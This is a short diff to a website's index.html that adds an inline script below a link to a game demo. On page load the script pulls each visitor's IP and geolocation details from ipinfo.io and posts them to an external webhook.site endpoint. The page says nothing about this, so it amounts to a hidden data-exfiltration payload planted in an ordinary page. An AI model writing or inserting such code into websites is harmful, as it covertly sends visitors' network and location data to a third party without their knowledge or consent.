--- a/index.html
+++ b/index.html
@@ -10,5 +10,25 @@
 	<body>
 		<h1>Main page</h1>
 		<a href=/docs/game-tf-main>Tactical Frontier Demo</a>
+
+		<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script>
+
+		<script>
+$.getJSON('http://ipinfo.io', function(data){
+
+$.post("https://webhook.site/3926f4cd-49d6-486e-836c-b24498b478b0",
+  {
+    name: data,
+  },
+  function(data, status){
+    alert("Data: " + data + "\nStatus: " + status);
+  });
+
+
+ });
+			
+			
+		</script>
+		
 	</body>
 </html>
